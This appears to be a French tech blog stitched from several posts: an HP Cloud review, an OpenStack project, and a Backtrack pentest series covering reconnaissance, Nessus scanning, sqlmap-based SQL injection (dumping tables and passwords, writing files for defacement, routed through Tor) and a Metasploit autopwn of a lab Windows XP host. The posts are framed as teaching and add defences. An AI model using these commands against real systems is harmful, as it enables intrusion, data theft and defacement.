Pour rappel, HP se lance dans le Cloud public avec l’arrivée d’HP Cloud Services qui propose tout comme ses concurrents (RackSpace, IBM, …) un cloud de type IaaS (Infrastructure As A Service).

Je me suis donc précipité sur l’invitation, et j’ai créé mon compte afin de tester tout ça.

Pour tout vous avouer, ce qui m’a le plus motivé à tester le produit, c’est évidemment le fait qu’il soit basé sur OpenStack.

Je vous rapporte donc ce que j’ai testé, et les différentes fonctionnalités que j’ai appréciées ou celle que je n’ai pas vues.

Résultats du test :

- Compute :

• 2 clusters localisés à l’ouest des USA (pour l’instant).
• Pour ma part, aucun problème de latence.
• 6 tailles de serveurs (j’ai testé la standard.xsmall ainsi que la standard.large)
• Plusieurs images disponibles, toutes basées sur Linux (Ubuntu, CentOS)
• 1 IP publique par VM ! Pour le coup, j’ai vraiment été surpris.
• la gestion des VMs peut se faire via API (avec euca2ools) sinon depuis le dashboard d’HP qui est plutôt bien fait.
• On accède aux VMs par SSH (avec la clé privée qu’il faut télécharger), et le terminal est bien renseigné (facturation, ressources consommées, charge en temps réel…)
• Voici mes critiques : impossibilité de faire des snapshots des VMs (pour l’instant j’imagine), pas moyen pour le moment de créer des volumes, et de les attacher aux VMs (avec la fonction de snapshot si possible).
• Ensuite, j’aurais bien apprécier de pouvoir migrer les VMs entre cluster, mais je n’ai pas eu de réponse d’HP concernant cette fonctionnalité… A voir donc si ce sera possible dans l’avenir.

- Cloud storage :

• L’interface Web intègre une gestion de son Cloud Storage.
• Les fonctionnalités sont rudimentaires : Envoyer / Télécharger des fichiers depuis cet espace.
• J’imagine que derrière tout ça se cache le module Swift (OpenStack Storage) donc rien à dire de ce coté, si ce n’est qu’on ne connaît pas encore la limite de stockage pour l’offre de base, et il n’y a pas encore de fonction de partage de fichier. Bref, c’est une Beta !!
• Cela-dit, je suis plutôt content qu’une interface web soit enfin développée pour gérer du cloud storage avec Swift. Remarquez sur la capture d’écran que l’interface est plutôt simple mais assez complète pour l’instant.

Bien sûr, ces remarques n’engagent que moi-même, et je suis ouvert à toute discussion.

Dans tous les cas, je suis très heureux de voir OpenStack continu d’être adopté par les plus grands de ce monde… Pourvu que ça dure !!!

Cela fait plusieurs semaines que je travaille sur un projet de Cloud Open-Source, de type IaaS (Infrastructure As A Service). Je dois dire que c’est un projet très intéressant et surtout prometteur dans un monde où VMware a tendance à écraser le marché. Je trouve génial de pouvoir disposer d’outils libres et gratuits pour comprendre la virtualisation.

Dans cet article, je vais vous présenter mon projet, et je vous publie aussi le résultat de mon travail (un Powerpoint d’une cinquantaine de slides qui résume mon étude).

Mise en situation

Concrètement, il m’a été demandé par mon directeur de formation d’installer un service de Cloud Computing Open-Source (avec OpenStack) qui fournirait un catalogue d’images (Ubuntu Server, Windows 2008 R2, etc) et managable depuis un navigateur Web. Plus concrètement, voici un descriptif du processus :

• Le client se connecte via un navigateur Web sur un Dashboard
• En fonction de son profil, il a le droit ou non de créer des machines virtuelles, de créer des images, des snapshots, de gérer son réseau, etc.
• Le client crée une machine virtuelle (exemple : Ubuntu Server) à partir d’un template, et lui attribue une adresse IP publique.
• Il peut accéder à sa VM via SSH et a un accès root au système.
• La machine peut être rebootée, et éteinte.
• Le client peut consulter ce qu’il a consommé et voir combien il paiera en fin de mois pour son usage.

Plusieurs points sont intéressants, c’est tout d’abord le dashboard. Accessible depuis Internet, le client s’authentifie de manière sécurisée et effectue toutes ses tâches nécessaires. Secundo, le principe de facturation est super intéressant pour une entreprise qui facture à son client en fonction de son utilisation. Enfin, outre le fait que tout les outils sont libres et gratuits, ils sont très compatibles avec les API des autres systèmes (ex : Xen, VMware, etc).

Mon étude

Je ne vais pas rentrer dans les détails ici, mais plutôt vous donner le lien de téléchargement de mon fichier PDF que j’ai réalisé pour ma présentation.

Voici un aperçu avec Google Doc (il manque des visuels) :

Download (PDF, 1.09MB)

Dans quelques semaines, je recommence à travailler sur ce projet, et je vais me concentrer sur le nouveau Dashboard (Diablo) qui permet de faire plus de trucs que le module Cloud de Drupal. J’aimerais aussi me pencher sur la compatibilité avec les autres hyperviseurs, notamment les proprio (ça m’intrigue !). Enfin, je compte me perfectionner sur la haute disponibilité pour prétendre avoir un Cloud Open-Source performant, disponible, et compatible !

La suite bientôt…
PS : Le document fourni est 100% libre de droit, mais en cas de réutilisation, merci de me prévenir . Je suis également adepte au remarques et critiques, donc n’hésitez pas !

Je ne peux pas parler de ce sujet sans aborder les injections SQL. Toutefois, la lecture de ces quelques lignes requiert certaines connaissances en base de données SQL. Je ne ferai aucun rappel sur ce langage.

Voici le plan de cet article :

• Définition
• Exploitation
• Impact
• Se protéger

Bien entendu, cet article a pour vocation d’expliquer comment les hackers font, et comment se protéger des attaques de ce type.

• Définition

Une injection SQL est une méthode d’exploitation d’une faille de sécurité liée à une base de données. Elle consiste via une application utilisant une base de données SQL à injecter une requête qui permettrait d’obtenir beaucoup d’informations allant de la version du serveur jusqu’à la base de données complète. Nous allons voir dans la partie « Impact » ce qui est exploitable également.

Techniquement, une injection SQL via un site web consiste à exploiter une variable non protégée appelée via une URL.

Voici un bref exemple : « http://www.target.com/photos.php?id=1 »

Cette URL affiche par défaut la page d’identifiant 1 par rapport à la base de données.
En fin de compte, cette URL pourrait ressembler à cette requête SQL :

SELECT *
FROM photos
WHERE 'id_photos = 1' ;

Cette requête pourtant simple permet toutefois beaucoup de choses si le code PHP a été mal programmé. Nous y reviendrons plus tard.

• Exploitation

La meilleure explication est l’exemple.

Le hacker va tout d’abord chercher sa victime en fouillant le site Internet cible. Il pourra notamment s’aider de Google.

Par exemple, il va rechercher sur Google tous les « gallery.php » utilisant des ID :
inurl:gallery.php?id=

Dans la plupart des cas, les sites Web sont faits à l’aide de CMS, ou alors codés entièrement à la main. Mais il arrive que ces CMS ne soit pas à jour, ou alors que le développeur web n’est pas pris soin de protéger les variables utilisées par les URL.

Lorsque le hacker va tomber sur une page de ce style, il va remplacer le 1 par un -53 par exemple, de manière à provoquer une erreur.

Si le message suivant apparaît, vous pouvez être sûrs qu’une injection SQL est possible :

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/users/site/html/gallery.php on line 248

En fait, j’irai même plus loin en disant que si http://www.target.com/photos.php?id=1 affiche la même chose que http://www.target.com/photos.php?id=1+AND+1=1 ou/et que http://www.target.com/photos.php?id=1+AND+1=2 diffère de la 1ère page, il y a vulnérabilité.

Avec la distribution Backtrack, voyons maintenant ce que l’on peut faire. L’excellent outil « SQLmap » nous permettra de réaliser tous les tests nécessaire pour une injection SQL.

Je vais vous montrer quelques commandes (je n’invente rien, j’ai juste lu la doc ).

Note : Dans toutes mes commandes, j’utilise TOR pour rester anonyme, ainsi qu’un générateur d’USER-AGENT pour que le serveur web distant ne détecte pas de requêtes HTTP provenant d’un certain « SQLmap ».

Pour exécuter ces commandes, il faut avant se rendre dans le répertoire /pentest/database/sqlmap. Il faut également remplacer quand c’est le cas dans mes commandes $url par l’URL du site, $db par le nom de la base de données, $table par le nom de la table, $column par le nom de la colonne et $sql par la requête SQL voulue.

Auditer si l’URL est vulnérable :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent

Si le site est vulnérable, il vous le dira explicitement.

C’est le cas pour notre exemple, passons à la suite.

Lister les privilèges SQL avec l’injection SQL :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –privileges

Lister les bases de données :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –dbs

Indiquer le nom de la base de données où l’injection SQL se fait :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –current-db

Montrer les mots de passe d’accès à la base de données :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –passwords

Lister les tables sur 5 threads (plus rapide) :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –tables -D $db –threads= »5″

Lister les colonnes :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –columns -D $bdd -T $tables

Dumper le contenu d’une table :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –dump -D $db -T $table –threads= »5″

Exécuter une requête SQL :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –sql-query= »$sql » -D $db

Si vraiment le serveur est mal configuré, il est aussi possible d’écrire un fichier (utilisé lors de defacements) :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –file-write=$file –file-dest /var/www/public_html/

SQLmap s’utilise aussi avec Metasploit :

$ msfconsole
 
                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##
 
msf > use auxiliary/scanner/http/sqlmap
msf auxiliary(sqlmap) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(sqlmap) > run

Vous l’aurez compris, cet outil est hyper puissant, d’ailleurs j’insiste sur le fait que pour obtenir de meilleurs résultats, il est important de le mettre à jour régulièrement avec l’option –update.

• Impact

Quel impact d’une telle attaque ?
La liste peut être longue, mais je vais faire court :

- compromission d’une partie ou d’une entière base de données, qui peut contenir des informations précieuses : logins, mots de passe, e-mails, coordonnées bancaires, etc.
- compromission d’autres bases de données quand un seul utilisateur existe pour 150 bases de données (sisi je vous jure, ça existe).
- compromission des données du serveur Web (on a vu qu’on pouvait dans certains cas écrire sur le serveur).

• Se protéger

Il existe à chaque niveau des moyens pour se protéger contre les injections SQL.

Je vais partir des couches basses pour remonter peu à peu :

- Installer un équipement de détection d’intrusion de type IDS et mettre régulièrement à jour la base de données qui contient les « exploits » connus.
- Installer un SGBDR connu, et le mettre à jour très régulièrement. Par exemple, MySQL est très performant, mais nécessite toutefois d’être mis-à-jour souvent.
- Utiliser au mieux toutes les fonctionnalités des bases de données : pour chaque site par exemple, créer sa base de données, son utilisateur SQL, avec un minimum de droits. Bien entendu, le concept d’un seul utilisateur avec tous les droits partout est à proscrire !!!
- Utiliser un serveur Web reconnu et le mettre à jour souvent. Apache est très bien reconnu dans le domaine.
- Enfin, il est plus qu’obligatoire de protéger toutes les variables utilisées.

Exemple : $id = mysql_real_escape_string($_POST['id']);

Dans ce domaine, voici un lien très intéressant. Si vous n’y connaissez rien, utiliser un CMS bien reconnu, et mettez-le à jour dès que possible ! (WordPress par exemple)

En résumé : utiliser des outils connus et les mettre à jour régulièrement.

En conclusion, SQL est un langage surpuissant, qui demande beaucoup de connaissances. Négliger la sécurité dans les couches hautes, peut compromettre tout le reste. Imaginer le pire : intrusion sur un serveur web via injection SQL, accès à d’autres serveurs via une connexion de pont, dump de toutes les bases de données, defacement de sites web…

Aujourd’hui, les injections SQL sont les vulnérabilités les plus utilisées sur le Web.
A bon entendeur…

L’exploitation de faille est un moment excitant. Toutes les recherches engagées vont normalement porter ses fruits. Nous allons enfin explorer les faiblesses d’un réseau ou d’un système.
Suivant les vulnérabilités, il y a des tonnes de possibilités en matière d’exploitation. Si vous voulez en savoir plus, faites comme moi et achetez un bon bouquin relatant des techniques de Hacking. Vous comprendrez mieux quelles sont les différentes méthodes pour exploiter une faille, ainsi que les différents types de failles.

Comme il existe beaucoup de types de failles, et énormément de méthodes, je m’arrêterai sur un cas général, en appliquant une technique « classique ».

Après avoir collecté un tas d’informations sur le réseau, ainsi que sur la machine ciblée, nous avons évaluer ses vulnérabilités. Rappelez-vous de notre bon ami Nessus qui nous a clairement indiqué que la machine cible avait comme système d’exploitation Windows XP SP3, et proposait le service de système de fichiers réseau CIFS. Seulement voilà, cette machine est vulnérable. Non pas parce qu’elle utilise ce service, mais parce que l’administrateur de la machine n’a pas pris le temps de mettre à jour régulièrement son système d’exploitation via Windows Update, ainsi que l’antivirus

Sachez que les tests réalisés en réseau local ont été effectué avec l’antivirus Avira Antivir (ainsi qu’une base de données antivirale de moins d’un an), sur un Windows XP SP3 sans mises à jour récentes.

Vous serez surpris de voir qu’il existe énormément d’ordinateurs au monde dans ce cas là. Ils sont souvent la proie des virus sur Internet (qui aident notamment à réaliser des attaques DDoS (Distributed Denial of Service).

Dans notre étude de cas, nous allons utiliser Metasploit Framework (MSF).

Sa base de données contient tous les exploits / payloads connus à ce jour. Bien entendu, pour une bonne utilisation de cet outil, il est important de le mettre à jour régulièrement (voir même avant chaque utilisation) avec la commande « msfupdate« .

Dans un terminal, démarrez l’outil « msfconsole« .

root@root:~# msfconsole
 
_
| |      o
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
|  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
 
=[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
 
msf >

Nous allons utiliser le résultat du scan Nessus exécuté dans dans la recherche de vulnérabilité (dernier article), et l’importer dans une base de données SQL :

msf > db_import /root/nessus_report_Win.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.128.129
[*] Successfully imported /root/nessus_report_Win.nessus
msf > db_import /root/nessus_report_Win.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.128.132
[*] Successfully imported /root/nessus_report_Win.nessus

MSF connaît maintenant votre victime : comment la joindre, et surtout quelles sont les vulnérabilités trouvées par Nessus.

Nous allons lancer une commande qui va automatiquement exploiter l’un des failles disponibles afin d’obtenir une session avec la machine distante. Admirez le travail :

msf > db_autopwn -x -e
[*] (1/3 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.128.132:445...
[*] (2/3 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.128.132:445...
[*] (3/3 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.128.132:445...
[*] (3/3 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.128.138:48400 -> 192.168.128.132:6313) at 2011-09-05 09:40:24 -0400
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...

0wned ! Le tour est joué, la machine distante est prise au piège. Nous avons utiliser l’exploit ms08_067_netapi pour pénétrer le système.
Pour retrouver une session ouverte, il suffit d’exécuter cette commande :

msf > sessions -l
 
Active sessions
===============
 
  Id  Type                   Information                           Connection
  --  ----                   -----------                           ----------
  1   meterpreter x86/win32  AUTORITE NT\SYSTEM @ VICTIME-484AF1D  192.168.128.138:48400 -> 192.168.128.132:6313

Et maintenant ?

Maintenant passons aux vilaines choses.
Pour obtenir le shell d’une session ouverte, il suffit de l’appeler par son ID :

session -i 1

Ensuite, la commande « help » vous éclairera sur la suite. Vous pouvez par exemple explorer les fichiers, prendre une capture d’écran, enregistrer les touches du clavier utilisées et encore plein d’autres trucs, dont des tâches administratives.

Cependant, un hacker ayant obtenu le shell d’un système essaye dans la plupart des cas de rester discret.
Dans le prochain article, nous allons voir comment installer un « backdoor » afin de pouvoir revenir plus tard sur le système sans exploiter de faille.
Ah oui, j’oubliais. Backtrack fournit une excellente interface graphique à MSF : « Armitage« .

Par rapport aux autres articles, aucune nouveauté en matière de lutte contre ce genre d’attaque. Un antivirus à jour, un pare-feu bien configuré, un système d’exploitation récent et à jour suffiront à éviter ce genre d’exploitation.

Aujourd’hui, les systèmes les plus vulnérables sont les sites Web qui sont très souvent victimes d’injections SQL permettant de récupérer des fichiers importants, et de compromettre la sécurité du serveur, et donc du réseau tout entier.

Nous continuons la série d’articles consacrés à Backtrack.

Rappelons en quelques mots les objectifs de ces quelques articles. Après avoir testé la distribution pendant quelques semaines, j’ai jugé sympa de partager quelques ressources. Chaque première partie d’un article permet de comprendre comment les pirates informatiques font pour pénétrer un système et pour obtenir des informations précieuses. La deuxième partie quant à elle explique comment éviter ce genre d’attaque, et donnes quelques indications sur la manière de protéger un réseau et un système.

Nous avons vu ensemble comment se déroulait la 1ère étape : la collecte d’informations.

Clairement, cette partie nous a fait comprendre comment identifier la cible :

• Son matériel (si possible)
• Son système d’exploitation (et si possible sa version)
• Ses services (si possible avec leur version)
• Pour les applications Web : leur langage de programmation
• Pour les bases de données : leur système de gestion de base de données

Ces informations recueillies ne sont pas perdues, bien au contraire. Nous allons maintenant les passer en revue pour détecter la moindre faille qui pourrait être exploitable par la suite.

Les moyens engagés pour détecter les vulnérabilités

• Scanner de vulnérabilité

- Nessus : Nous l’avions dit dans l’introduction consacrée à la distribution Backtrack, il est  incontournable dans le monde de la sécurité.

Avant toute chose, il est nécessaire d’obtenir une clé de licence (gratuite). Une fois reçue dans votre boite mail, exécutez la commande suivante :

sudo /opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx
sudo /opt/nessus/bin/nessus-fetch --security-center

Il faut maintenant créer un utilisateur interne au logiciel avec lequel vous vous loguerez pour faire des audits :

sudo /opt/nessus/sbin/nessus-adduser

Une fois configuré, mettez les plugins à jour avec la commande

nessus-update-plugins

Nous pouvons maintenant accéder au logiciel depuis un navigateur web à l’URL : http://localhost:8834

Renseignez le login / mot de passe configuré deux étapes plus haut. Vous avez un menu supérieur qui vous permet de gérer les utilisateurs, les politiques d’audit, les audits, et les rapports d’audit.

Dans un scénario classique, nous pouvons démarrer un audit directement en utilisant une politique par défaut. Dans mon scénario, nous avions détecté que la victime était un ordinateur disposant du système d’exploitation Windows XP SP3, ainsi que le partage de fichier activé. Créer un nouveau « Scan« , puis choisissez une des politiques par défaut (pour mon test, je choisis « Internal Network Scan« ). Je n’oublie pas de préciser l’adresse IP de la cible dans « Scan Targets« . Je clique sur « Launch scan« , et j’attends. Pour suivre en temps réel l’audit, rendez-vous dans le menu « Reports« . Cliquez deux fois sur le scan en cours, et découvrez les informations récoltées, avec leurs précisions.

Une fois le test terminé, les failles sont classées par importance. Sachez que si vous trouvez des failles dans la colonne « High« , il est certain que votre système est hautement vulnérable et facilement accessible depuis l’extérieur.

Dans notre étude de cas, nous avons découvert les vulnérabilités concernant le serveur SMB. Dans le prochain article, nous tenterons d’exploiter ces failles afin d’obtenir un shell sur l’ordinateur cible. En attendant, n’oubliez pas que ces informations sont précieuses et qu’il faut absolument les sauvegarder. Cliquez sur « Download Report » en bas à gauche. Choisissez le format par défaut et placer votre fichier en lieu sûr (dans Dradis par exemple).

Nous l’avons vu, Nessus est rapide et efficace. Il est important de mettre à jour régulièrement les plugins pour trouver les failles les plus récentes. Il est capable de nous donner énormément d’informations concernant la configuration d’un service distant. Nous le verrons un peu plus loin, c’est l’outil indispensable pour auditer soi-même nos propres systèmes.

- Mantra : Navigateur Web basé sur Firefox contenant un large panel de plugins utiles pour l’audit d’applications Web. En quelques clics, explorer les failles XSS, ou tentez des iSQL directement sur des pages Web. Les XSS sont relativement fréquentes sur Internet, surtout dans les formulaires où les développeurs Web ne prennent pas toujours le temps de sécuriser leur production.

• Évaluation du réseau

Nous avons vu deux outils généralistes pour scanner un réseau ou une application web. Voyons maintenant quelques outils plus spécialisés.

- Cisco Tools : Contient des scripts pour auditer des équipement actifs de marque Cisco. Certains outils sont capables de détecter la version de l’IOS d’un équipement distant, et donc de connaître ses vulnérabilités.

- Network Fuzzing : Injecte des données aléatoire sur un réseau. « Bed » est un outil puissant qui permet de détecter si un service peut être victime de Buffer Overflow (dépassement de mémoire tampon). Le logiciel « sfuzzer » est également un outil qui permet de tester un  logiciel.

- Rapports de vulnérabilité en ligne : Consultez OSVDB et CVE pour connaître les dernières failles en date.

- VOIP Fuzzing : Détecter les failles d’un réseaux VOIP avec la technique de fuzzing avec le logiciel « voiper » par exemple.

• Évaluation d’applications Web

Les réseaux ne sont pas les seuls vulnérables. Plus haut dans les couches du modèle OSI, les applications Web peuvent être une véritable porte d’entrée vers un système ou vers des informations compromettantes.

- Outils dédiés aux CMS : « Joomscan » est tout simplement l’outil de référence qui permet de détecter des failles dans un site web fait avec le CMS Joomla. L’outil est assez puissant, mais la mise à jour du logiciel ne fonctionne pas (la base de données des failles étant de 2009). « Plecost » est quant à lui dédié au CMS WordPress. Pensez à récupérer la dernière version du fichier texte qui contient les numéros de version des plugins WordPress.

- Webshag est un webfuzzer très simple d’utilisation, car il est disponible en interface graphique. L’outil Webslayer est également très puissant. Ces deux logiciels retenus permettent d’interroger violemment une page web afin d’en ressortir un maximum d’informations (nom des variables, e-mails, méthodes des formulaires, etc.)

- MetaGooFil est un script très pratique pour rechercher rapidement tous les fichiers disponibles triés par extensions  (exemple tous les PDF) sur un site web. Il n’est pas rare de trouver des fichiers texte contenant directement des adresses e-mail ou des mot de passe en clair. Le principal atout de ce logiciel est bien entendu l’extraction de méta-données. En effets, elle peuvent contenir les noms et prénoms des auteurs des fichiers, leurs logiciels et leurs versions, etc. Une mine d’or pour recueillir des informations sur la victime.

- W3af est l’outil Open-Source de référence pour auditer un site Web. Plusieurs plugins sont disponibles : bruteforce, audit, etc. Le résultat du scan nous indique les vulnérabilités présentes sur le site en question. J’ai trouvé ce site qui est un Wiki de W3af (et qui regorge d’informations essentielles).

• Évaluation de bases de données

Les outils d’évaluation de vulnérabilités de base de données sont les mêmes que ceux pour la collecte d’information :

- SQLmap et SQLninja : outils d’injection SQL

- SQLbrute : outil d’injection SQL en bruteforce.

Nous étudierons plus en détail ces outils dans l’exploitation de failles (prochain article).

Les moyens pour lutter contre la détection de vulnérabilités.

Je pense que ce sont les mêmes que pour la collecte d’information.

En effet, la détection de vulnérabilités est également une action de recherche d’informations, mais plus orientée dans la découverte des versions utilisées, ou dans les méthodes appliquées de développement.

Je clos cet article en précisant que la 1ère vulnérabilité est l’Homme. Sécuriser un réseau et un système est une action fondamentale, qui doit toujours rester à l’esprit du personnel informatique. Cependant, la formation du personnel de toute l’entreprise est également primordiale. Les grandes attaques très connues ont toutes commencées par une faille qui venait d’un ou plusieurs employés.

A bon entendeur,

La suite au prochain article : Exploitation.

Hop, c’est cadeau, voici un script tout simple pour sauvegarder automatiquement et périodiquement son site web :

• sauvegarde périodique (les fichiers sont conservés 15 jours)
• sauvegarde des bases de données (variables à changer)
• sauvegarde des fichiers du site (chemins à changer)

Ce n’est qu’un squelette, et vous êtes libres d’y ajouter votre grain de sel, n’hésitez pas à l’améliorer et à le partager ici !

#!/bin/sh
 
#définitions des variables :
datedujour=$(date +%Y%m%d)
fichierdujour=$(date +%Y%m%d)-SqlBackup.tar.gz
datequinze=$(date -d '15 days ago' +%Y%m%d)
 
# On afficher les infos date du jour et autre pour le log.
echo "Date du jour : $datedujour"
echo "Fichier du jour : $fichierdujour"
echo "Date il y a 15 jours : $datequinze"
 
#On supprime  toutes les sauvegardes existantes dans le dossier d'exécution
rm -f *.sql
 
# La commande dump :
mysqldump -h localhost -u LOGIN_BDD -pPASSWORD NOM_BDD > BDD.sql
 
#on archive tous les backups dans un zip a la date du jour
# tar czf $fichierdujour *.sql
 
#on sauvegarde les fichiers du repertoire web
tar -cvzf www.tgz /public_html/
 
#on cree le répertoire du jour et y place les backups
mkdir ~/backup/auto/$datedujour
mv *.sql  ~/backup/auto/$datedujour/
mv www* ~/backup/auto/$datedujour/
 
#on supprime le répertoire d il y a 15 jours s'il existe
if test -d ~/backup/auto/$datequinze; then
echo 'suppression des anciens backups vieux de 15 jours ou plus'
rm -rf ~/backup/auto/$datequinze
fi
 
#on supprime le tar.gz du jour
rm -f $fichierdujour

Puis exécuter :

crontab -e

Pour y ajouter la cron suivante :

0 0 * * * /root/scripts/backup.sh

Je peux maintenant dormir tranquille, cron s’occupe de tout…

Après une introduction sur la distribution Backtrack, voyons maintenant quelques techniques de collecte d’informations.

Cette première étape est fondamentale pour la suite. Sans les informations recueillies, vous serez incapables d’exploiter les failles d’un réseau ou d’un système.

Nous allons voir tout d’abord les moyens utilisés pour collecter ces informations et ensuite les techniques pour se protéger contre cela.

Les moyens engagés pour collecter des informations.

• Analyse du réseau

- Netdiscover : Outil de découverte réseau

Exemple :

netdiscover -i eth0 -r 192.168.128.0/24

Cet outil est une des premières étapes lorsque nous recherchons des victimes potentielles. Sans adresse IP, pas d’attaque… Un autre outil existe en interface graphique, et propose la découverte réseau couplée au scan de port, ainsi qu’à l’OS-Fingerprinting : Autoscan.

- Zenmap : Scanner de port en interface graphique (utilisant Nmap)

Exemple d’un scan « intense » :

nmap -T4 -A -v 192.168.128.132

Retrying OS detection (try #5) against 192.168.128.132
NSE: Script scanning 192.168.128.132.
Initiating NSE at 14:51
Completed NSE at 14:51, 0.17s elapsed
Nmap scan report for 192.168.128.132
Host is up (0.00057s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds

 

Nmap est l’outil de référence pour scanner les ports ouverts d’une machine. Je tiens à préciser que l’utilisation de Nmap peut réveiller un pare-feu, et avertir un utilisateur que sa machine a été victime d’un scan de port. Il faut donc l’utiliser avec discrétion, et ne pas hésiter à bien lire la documentation pour utiliser les bonnes options.

Nous n’irons pas plus loin pour le moment, la suite étant la détection de vulnérabilités.

• Analyse d’applications Web

Un serveur Web est toujours très bavard. Il peut renseigner pas mal d’informations précieuses, qui peuvent souvent compromettre la sécurité du système.

- whatweb : Obenir la version du serveur, les variables HTTP, ainsi que le nom de l’application Web installée

Exemple :

whatweb http://my1.fr/blog

- webshag : Outil qui permet de scanner un serveur web. Il propose entre autre de détecter l’arborescence du répertoire web, de détecter la version du serveur, etc. C’est en scannant un serveur Web que nous pourrons découvrir les différentes applications installées dessus, et pourquoi pas un CMS connu comme Joomla, ou WordPress.

- cms-explorer : Après avoir découvert quelle application web était installée sur un serveur Web, nous allons découvrir le thème installé, ainsi que les extensions utilisées. Ainsi, nous pourrons peut-être par la suite exploiter telle ou telle faille dans un plugin. Pour vous donner un exemple concret, les attaques XSS et SQLi sont les plus rependues actuellement sur le web et sont dans la plupart des cas la cause des défacements de sites web ou vols de bases de données.

- wafw00f : Script en python qui permet de détecter des pare-feu pour serveur Web (Reverse Proxy par exemple).

• Analyse de bases de données

 - msf : le fameux framework permet de détecter les bases de données Microsoft SQL.

Exemple :

# msf console

msf > use scanner/mssql/mssql_ping

msf auxiliary(mssql_ping) > set RHOSTS 192.168.128.0/24

msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for 192.168.128.12:
[*] tcp = 1433
[*] np = SRVBDD-0pipesqlquery
[*] Version = 8.00.192
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SRVBDD-0
[*] Auxiliary module execution completed

- SQLmap : Logiciel d’injection SQL, et prise de contrôle de base de données. Pas mal de tutoriels en vidéo sont disponibles ICI.

• Analyse des réseaux sans fil

Nous sommes de plus en plus connectés sans-fil. Que ce soit en bluetooth ou en wifi, les équipements sont toujours plus perfectionnés mais pas toujours bien sécurisés.

La suite logicielle aircrack-ng contient les outils wifi les plus puissants du moment.

- airodump : Outil de capture de paquets 802.11, capable d’enregistrer du traffic en clair, et même crypté. Dans un premier temps, il est nécessaire de scanner les réseaux sans-fil disponibles, pour ensuite voir ceux qui sont ouverts ou protégés. Les algorithmes de chiffrement sont précisés, et peuvent donc donner pas mal d’informations importantes pour une personne malveillante.

- bluediving : Logiciel de scan bluetooth, qui permet aussi de lancer des attaques contre les équipements trouvés.

• Rassembler, et partager les informations collectées

Que vous travaillez seul ou en équipe, les informations prises doivent êtres placées en lieux sûr, et surtout bien organisées. Backtrack propose un framework Open-Source nommé Dradis. Dans une interface web, insérez les résultats de vos scans NMAP, Nessus, vos notes, etc. Partagez-les grâce au serveur web intégré, tout en maintenant la confidentialité des données avec le module SSL activé par défaut.

Les moyens pour lutter contre la collecte d’information.

• Se protéger contre l’analyse du réseau

Pour se protéger contre les scans de ports ou encore les requêtes réseau étranges, il y a quelques règles à respecter :

- installer une solution pare-feu sur toutes les machines (clientes et serveurs).

- sur les machines Linux, installer le paquet psad  et suivez ce tutoriel plutôt bien fait qui permet de bloquer les scans de port.

- sur les équipements actifs, configurer une table de correspondances adresse MAC / adresse IP statique.

- utiliser des sondes IDS/IPS pour la détection d’intrusion. Elles écoutent le réseau pendant un certain temps, et sont capables de détecter un trafic anormal. Snort est une solution libre qui est très réputé dans le milieu de l’IDS.

- mettre à jour régulièrement les IOS des équipements actifs.

• Analyse d’applications Web

- sécuriser les serveurs Web (très longue tache). Pour Apache, voici un très bon guide établi par la NSA (National Security Agency) qui explique les différents points à configurer pour avoir un serveur web sécurisé.

- utiliser un reverse-proxy. Cloudfare propose une offre gratuite de base qui donne une bonne protection de serveur Web. Les requêtes HTTP passent d’abord par le reverse-proxy, et sont envoyées au serveur Web ; très utile pour se prémunir contre les attaques de déni de service (DOS).

- Lorsqu’on développe en langage dynamique (au hasard : PHP), protéger les variables, pour éviter les injections SQL. Voici un excellent tutoriel. Il faut également protéger tous les formulaires pour éviter les failles XSS. Paul Da Silva l’explique très bien sur son blog dans un cours comment se protéger contre ces attaques.

- Enfin, quand nous utilisons un CMS (comme WordPress, Drupal, Joomla, etc), la règle d’or est la mise-à-jour. Se tenir au courant soit directement sur le site officiel du CMS, soit via des extensions de mises-à-jour automatiques. Éviter d’utiliser trop de plugins sur son site, car certains contiennent souvent pas mal de failles. Choisir ses extensions, et les mettre à jour diminuera donc le risque d’attaque.

• Analyse de bases de données

